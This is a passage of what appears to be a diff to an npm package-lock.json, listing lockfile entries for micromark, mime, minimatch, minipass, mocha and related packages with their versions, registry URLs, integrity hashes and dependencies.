"^2.0.0", + "micromark-util-chunked": "^2.0.0", + "micromark-util-combine-extensions": "^2.0.0", + "micromark-util-decode-numeric-character-reference": "^2.0.0", + 
"micromark-util-encode": "^2.0.0", + "micromark-util-normalize-identifier": "^2.0.0", + "micromark-util-resolve-all": "^2.0.0", + "micromark-util-sanitize-uri": "^2.0.0", + "micromark-util-subtokenize": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-core-commonmark": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-core-commonmark/-/micromark-core-commonmark-2.0.0.tgz", + "integrity": "sha512-jThOz/pVmAYUtkroV3D5c1osFXAMv9e0ypGDOIZuCeAe91/sD6BoE2Sjzt30yuXtwOYUmySOhMas/PVyh02itA==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "decode-named-character-reference": "^1.0.0", + "devlop": "^1.0.0", + "micromark-factory-destination": "^2.0.0", + "micromark-factory-label": "^2.0.0", + "micromark-factory-space": "^2.0.0", + "micromark-factory-title": "^2.0.0", + "micromark-factory-whitespace": "^2.0.0", + "micromark-util-character": "^2.0.0", + "micromark-util-chunked": "^2.0.0", + "micromark-util-classify-character": "^2.0.0", + "micromark-util-html-tag-name": "^2.0.0", + "micromark-util-normalize-identifier": "^2.0.0", + "micromark-util-resolve-all": "^2.0.0", + "micromark-util-subtokenize": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-factory-destination": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-factory-destination/-/micromark-factory-destination-2.0.0.tgz", + "integrity": "sha512-j9DGrQLm/Uhl2tCzcbLhy5kXsgkHUrjJHg4fFAeoMRwJmJerT9aw4FEhIbZStWN8A3qMwOp1uzHr4UL8AInxtA==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-character": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-factory-label": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-factory-label/-/micromark-factory-label-2.0.0.tgz", + "integrity": "sha512-RR3i96ohZGde//4WSe/dJsxOX6vxIg9TimLAS3i4EhBAFx8Sm5SmqVfR8E87DPSR31nEAjZfbt91OMZWcNgdZw==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "devlop": "^1.0.0", + "micromark-util-character": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-factory-space": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-factory-space/-/micromark-factory-space-2.0.0.tgz", + "integrity": "sha512-TKr+LIDX2pkBJXFLzpyPyljzYK3MtmllMUMODTQJIUfDGncESaqB90db9IAUcz4AZAJFdd8U9zOp9ty1458rxg==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-character": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-factory-title": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-factory-title/-/micromark-factory-title-2.0.0.tgz", + "integrity": 
"sha512-jY8CSxmpWLOxS+t8W+FG3Xigc0RDQA9bKMY/EwILvsesiRniiVMejYTE4wumNc2f4UbAa4WsHqe3J1QS1sli+A==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-factory-space": "^2.0.0", + "micromark-util-character": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-factory-whitespace": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-factory-whitespace/-/micromark-factory-whitespace-2.0.0.tgz", + "integrity": "sha512-28kbwaBjc5yAI1XadbdPYHX/eDnqaUFVikLwrO7FDnKG7lpgxnvk/XGRhX/PN0mOZ+dBSZ+LgunHS+6tYQAzhA==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-factory-space": "^2.0.0", + "micromark-util-character": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-util-character": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/micromark-util-character/-/micromark-util-character-2.1.0.tgz", + "integrity": "sha512-KvOVV+X1yLBfs9dCBSopq/+G1PcgT3lAK07mC4BzXi5E7ahzMAF8oIupDDJ6mievI6F+lAATkbQQlQixJfT3aQ==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-util-chunked": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-chunked/-/micromark-util-chunked-2.0.0.tgz", + "integrity": "sha512-anK8SWmNphkXdaKgz5hJvGa7l00qmcaUQoMYsBwDlSKFKjc6gjGXPDw3FNL3Nbwq5L8gE+RCbGqTw49FK5Qyvg==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-symbol": "^2.0.0" + } + }, + "node_modules/micromark-util-classify-character": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-classify-character/-/micromark-util-classify-character-2.0.0.tgz", + "integrity": "sha512-S0ze2R9GH+fu41FA7pbSqNWObo/kzwf8rN/+IGlW/4tC6oACOs8B++bh+i9bVyNnwCcuksbFwsBme5OCKXCwIw==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-character": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-util-combine-extensions": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-combine-extensions/-/micromark-util-combine-extensions-2.0.0.tgz", + "integrity": "sha512-vZZio48k7ON0fVS3CUgFatWHoKbbLTK/rT7pzpJ4Bjp5JjkZeasRfrS9wsBdDJK2cJLHMckXZdzPSSr1B8a4oQ==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-chunked": "^2.0.0", + 
"micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-util-decode-numeric-character-reference": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/micromark-util-decode-numeric-character-reference/-/micromark-util-decode-numeric-character-reference-2.0.1.tgz", + "integrity": "sha512-bmkNc7z8Wn6kgjZmVHOX3SowGmVdhYS7yBpMnuMnPzDq/6xwVA604DuOXMZTO1lvq01g+Adfa0pE2UKGlxL1XQ==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-symbol": "^2.0.0" + } + }, + "node_modules/micromark-util-encode": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-encode/-/micromark-util-encode-2.0.0.tgz", + "integrity": "sha512-pS+ROfCXAGLWCOc8egcBvT0kf27GoWMqtdarNfDcjb6YLuV5cM3ioG45Ys2qOVqeqSbjaKg72vU+Wby3eddPsA==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ] + }, + "node_modules/micromark-util-html-tag-name": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-html-tag-name/-/micromark-util-html-tag-name-2.0.0.tgz", + "integrity": "sha512-xNn4Pqkj2puRhKdKTm8t1YHC/BAjx6CEwRFXntTaRf/x16aqka6ouVoutm+QdkISTlT7e2zU7U4ZdlDLJd2Mcw==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ] + }, + "node_modules/micromark-util-normalize-identifier": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-normalize-identifier/-/micromark-util-normalize-identifier-2.0.0.tgz", + "integrity": "sha512-2xhYT0sfo85FMrUPtHcPo2rrp1lwbDEEzpx7jiH2xXJLqBuy4H0GgXk5ToU8IEwoROtXuL8ND0ttVa4rNqYK3w==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-symbol": "^2.0.0" + } + }, + "node_modules/micromark-util-resolve-all": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-resolve-all/-/micromark-util-resolve-all-2.0.0.tgz", + "integrity": "sha512-6KU6qO7DZ7GJkaCgwBNtplXCvGkJToU86ybBAUdavvgsCiG8lSSvYxr9MhwmQ+udpzywHsl4RpGJsYWG1pDOcA==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-util-sanitize-uri": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-sanitize-uri/-/micromark-util-sanitize-uri-2.0.0.tgz", + "integrity": "sha512-WhYv5UEcZrbAtlsnPuChHUAsu/iBPOVaEVsntLBIdpibO0ddy8OzavZz3iL2xVvBZOpolujSliP65Kq0/7KIYw==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-character": "^2.0.0", + "micromark-util-encode": "^2.0.0", + "micromark-util-symbol": "^2.0.0" + } + }, + "node_modules/micromark-util-subtokenize": { + "version": "2.0.0", + "resolved": 
"https://registry.npmjs.org/micromark-util-subtokenize/-/micromark-util-subtokenize-2.0.0.tgz", + "integrity": "sha512-vc93L1t+gpR3p8jxeVdaYlbV2jTYteDje19rNSS/H5dlhxUYll5Fy6vJ2cDwP8RnsXi818yGty1ayP55y3W6fg==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "devlop": "^1.0.0", + "micromark-util-chunked": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-util-symbol": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-symbol/-/micromark-util-symbol-2.0.0.tgz", + "integrity": "sha512-8JZt9ElZ5kyTnO94muPxIGS8oyElRJaiJO8EzV6ZSyGQ1Is8xwl4Q45qU5UOg+bGH4AikWziz0iN4sFLWs8PGw==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ] + }, + "node_modules/micromark-util-types": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-types/-/micromark-util-types-2.0.0.tgz", + "integrity": "sha512-oNh6S2WMHWRZrmutsRmDDfkzKtxF+bc2VxLC9dvtrDIRFln627VsFP6fLMgTryGDljgLPjkrzQSDcPrjPyDJ5w==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ] + }, + "node_modules/micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", + "license": "MIT", + "dependencies": { + "braces": "^3.0.3", + "picomatch": "^2.3.1" + }, + "engines": { + "node": ">=8.6" + } + }, + "node_modules/mime": { + "version": "2.6.0", + "resolved": "https://registry.npmjs.org/mime/-/mime-2.6.0.tgz", + "integrity": "sha512-USPkMeET31rOMiarsBNIHZKLGgvKc/LrjofAnBlOttf5ajRvqiRA8QsenbcooctK6d6Ts6aqZXBA+XbkKthiQg==", + "dev": true, + "bin": { + "mime": "cli.js" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/mime-db": { + "version": "1.51.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.51.0.tgz", + "integrity": "sha512-5y8A56jg7XVQx2mbv1lu49NR4dokRnhZYTtL+KGfaa27uq4pSTXkwQkFJl4pkRMyNFz/EtYDSkiiEHx3F7UN6g==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mime-match": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/mime-match/-/mime-match-1.0.2.tgz", + "integrity": "sha1-P4fDHprxpf1IX7nbE0Qosju7e6g=", + "dev": true, + "dependencies": { + "wildcard": "^1.1.0" + } + }, + "node_modules/mime-types": { + "version": "2.1.34", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.34.tgz", + "integrity": "sha512-6cP692WwGIs9XXdOO4++N+7qjqv0rqxxVvJ3VHPh/Sc9mVZcQP+ZGhkKiTvWMQRr2tbHkJP/Yn7Y0npb3ZBs4A==", + "dependencies": { + "mime-db": "1.51.0" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mimic-fn": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", + "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/mimic-response": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/mimic-response/-/mimic-response-3.1.0.tgz", + 
"integrity": "sha512-z0yWI+4FDrrweS8Zmt4Ej5HdJmky15+L2e6Wgn3+iK5fWzb6T3fhNFq2+MeTRb064c6Wr4N/wv0DzQTjNzHNGQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/min-document": { + "version": "2.19.0", + "resolved": "https://registry.npmjs.org/min-document/-/min-document-2.19.0.tgz", + "integrity": "sha1-e9KC4/WELtKVu3SM3Z8f+iyCRoU=", + "dev": true, + "dependencies": { + "dom-walk": "^0.1.0" + } + }, + "node_modules/min-indent": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/min-indent/-/min-indent-1.0.1.tgz", + "integrity": "sha512-I9jwMn07Sy/IwOj3zVkVik2JTvgpaykDZEigL6Rx6N9LbMywwUSMtxET+7lVoDLLd3O3IXwJwvuuns8UB/HeAg==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/mini-css-extract-plugin": { + "version": "2.7.6", + "resolved": "https://registry.npmjs.org/mini-css-extract-plugin/-/mini-css-extract-plugin-2.7.6.tgz", + "integrity": "sha512-Qk7HcgaPkGG6eD77mLvZS1nmxlao3j+9PkrT9Uc7HAE1id3F41+DdBRYRYkbyfNRGzm8/YWtzhw7nVPmwhqTQw==", + "dev": true, + "dependencies": { + "schema-utils": "^4.0.0" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + } + }, + "node_modules/mini-css-extract-plugin/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": "sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/mini-css-extract-plugin/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/mini-css-extract-plugin/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "node_modules/mini-css-extract-plugin/node_modules/schema-utils": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.0.1.tgz", + "integrity": "sha512-lELhBAAly9NowEsX0yZBlw9ahZG+sK/1RJ21EpzdYHKEs13Vku3LJ+MIPhh4sMs0oCCeufZQEQbMekiA4vuVIQ==", + "dev": true, + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/minimalistic-assert": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/minimalistic-assert/-/minimalistic-assert-1.0.1.tgz", + "integrity": "sha512-UtJcAD4yEaGtjPezWuO9wC4nwUnVH/8/Im3yEHQP4b67cXlD/Qr9hdITCU1xDbSEXg2XKNaP8jsReV7vQd00/A==", + "dev": true, + "license": "ISC" + }, + "node_modules/minimatch": { + "version": 
"3.1.2", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", + "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", + "dependencies": { + "brace-expansion": "^1.1.7" + }, + "engines": { + "node": "*" + } + }, + "node_modules/minimist": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", + "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/minimisted": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/minimisted/-/minimisted-2.0.1.tgz", + "integrity": "sha512-1oPjfuLQa2caorJUM8HV8lGgWCc0qqAO1MNv/k05G4qslmsndV/5WdNZrqCiyqiz3wohia2Ij2B7w2Dr7/IyrA==", + "dev": true, + "license": "MIT", + "dependencies": { + "minimist": "^1.2.5" + } + }, + "node_modules/minipass": { + "version": "3.1.6", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.1.6.tgz", + "integrity": "sha512-rty5kpw9/z8SX9dmxblFA6edItUmwJgMeYDZRrwlIVN27i8gysGbznJwUggw2V/FVqFSDdWy040ZPS811DYAqQ==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/minipass/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/minizlib": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", + "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", + "dependencies": { + "minipass": "^3.0.0", + "yallist": "^4.0.0" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/minizlib/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/mirror_documentation": { + "resolved": "jobs/mirror-documentation", + "link": true + }, + "node_modules/mixin-deep": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/mixin-deep/-/mixin-deep-1.3.2.tgz", + "integrity": "sha512-WRoDn//mXBiJ1H40rqa3vH0toePwSsGb45iInWlTySa+Uu4k3tYUSxa2v1KqAiLtvlrSzaExqS1gtk96A9zvEA==", + "dev": true, + "dependencies": { + "for-in": "^1.0.2", + "is-extendable": "^1.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/mixme": { + "version": "0.5.4", + "resolved": "https://registry.npmjs.org/mixme/-/mixme-0.5.4.tgz", + "integrity": "sha512-3KYa4m4Vlqx98GPdOHghxSdNtTvcP8E0kkaJ5Dlh+h2DRzF7zpuVVcA8B0QpKd11YJeP9QQ7ASkKzOeu195Wzw==", + "engines": { + "node": ">= 8.0.0" + } + }, + "node_modules/mixpanel": { + "version": "0.13.0", + "resolved": "https://registry.npmjs.org/mixpanel/-/mixpanel-0.13.0.tgz", + "integrity": "sha512-YOWmpr/o4+zJ8LPjuLUkWLc2ImFeIkX6hF1t62Wlvq6loC6e8EK8qieYO4gYPTPxxtjAryl7xmIvf/7qnPwjrQ==", + "dependencies": { + "https-proxy-agent": "5.0.0" + }, + "engines": { + "node": ">=10.0" + } + }, + "node_modules/mkdirp": { + "version": "0.5.6", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", + "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", + "dependencies": { + "minimist": "^1.2.6" + }, + "bin": { + "mkdirp": "bin/cmd.js" + } 
+ }, + "node_modules/mkdirp-classic": { + "version": "0.5.3", + "resolved": "https://registry.npmjs.org/mkdirp-classic/-/mkdirp-classic-0.5.3.tgz", + "integrity": "sha512-gKLcREMhtuZRwRAfqP3RFW+TK4JqApVBtOIftVgjuABpAtpxhPGaDcfvbhNvD0B8iD1oUr/txX35NjcaY6Ns/A==" + }, + "node_modules/mlly": { + "version": "1.7.4", + "resolved": "https://registry.npmjs.org/mlly/-/mlly-1.7.4.tgz", + "integrity": "sha512-qmdSIPC4bDJXgZTCR7XosJiNKySV7O215tsPtDN9iEO/7q/76b/ijtgRu/+epFXSJhijtTCCGp3DWS549P3xKw==", + "dev": true, + "license": "MIT", + "dependencies": { + "acorn": "^8.14.0", + "pathe": "^2.0.1", + "pkg-types": "^1.3.0", + "ufo": "^1.5.4" + } + }, + "node_modules/mlly/node_modules/acorn": { + "version": "8.14.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.14.1.tgz", + "integrity": "sha512-OvQ/2pUDKmgfCg++xsTX1wGxfTaszcHVcTctW4UJB4hibJx2HXxxO5UmVgyjMa+ZDsiaf5wWLXYpRWMmBI0QHg==", + "dev": true, + "license": "MIT", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/mmdb-lib": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/mmdb-lib/-/mmdb-lib-2.0.2.tgz", + "integrity": "sha512-shi1I+fCPQonhTi7qyb6hr7hi87R7YS69FlfJiMFuJ12+grx0JyL56gLNzGTYXPU7EhAPkMLliGeyHer0K+AVA==", + "engines": { + "node": ">=10", + "npm": ">=6" + } + }, + "node_modules/mmmagic": { + "version": "0.5.3", + "resolved": "https://registry.npmjs.org/mmmagic/-/mmmagic-0.5.3.tgz", + "integrity": "sha512-xLqCu7GJYTzJczg0jafXFuh+iPzQL/ru0YYf4GiTTz8Cehru/wiXtUS8Pp8Xi77zNaiVndJ0OO1yAFci6iHyFg==", + "hasInstallScript": true, + "dependencies": { + "nan": "^2.13.2" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/mocha": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/mocha/-/mocha-11.1.0.tgz", + "integrity": "sha512-8uJR5RTC2NgpY3GrYcgpZrsEd9zKbPDpob1RezyR2upGHRQtHWofmzTMzTMSV6dru3tj5Ukt0+Vnq1qhFEEwAg==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-colors": "^4.1.3", + "browser-stdout": "^1.3.1", + "chokidar": "^3.5.3", + "debug": "^4.3.5", + "diff": "^5.2.0", + "escape-string-regexp": "^4.0.0", + "find-up": "^5.0.0", + "glob": "^10.4.5", + "he": "^1.2.0", + "js-yaml": "^4.1.0", + "log-symbols": "^4.1.0", + "minimatch": "^5.1.6", + "ms": "^2.1.3", + "serialize-javascript": "^6.0.2", + "strip-json-comments": "^3.1.1", + "supports-color": "^8.1.1", + "workerpool": "^6.5.1", + "yargs": "^17.7.2", + "yargs-parser": "^21.1.1", + "yargs-unparser": "^2.0.0" + }, + "bin": { + "_mocha": "bin/_mocha", + "mocha": "bin/mocha.js" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + } + }, + "node_modules/mocha-each": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/mocha-each/-/mocha-each-2.0.1.tgz", + "integrity": "sha512-0ZgWY5ajbnROXkfyaDb+0RAYzDBH3QVow/1zJiyl7lYMRnj1Nid8RDP2+/2TTajB5n4vr21v35MjB72GjFFj2g==", + "dev": true, + "dependencies": { + "sprintf-js": "^1.0.3" + } + }, + "node_modules/mocha/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "license": "MIT", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/mocha/node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "dev": 
true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/mocha/node_modules/foreground-child": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.1.tgz", + "integrity": "sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw==", + "dev": true, + "license": "ISC", + "dependencies": { + "cross-spawn": "^7.0.6", + "signal-exit": "^4.0.1" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/mocha/node_modules/glob": { + "version": "10.4.5", + "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", + "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", + "dev": true, + "license": "ISC", + "dependencies": { + "foreground-child": "^3.1.0", + "jackspeak": "^3.1.2", + "minimatch": "^9.0.4", + "minipass": "^7.1.2", + "package-json-from-dist": "^1.0.0", + 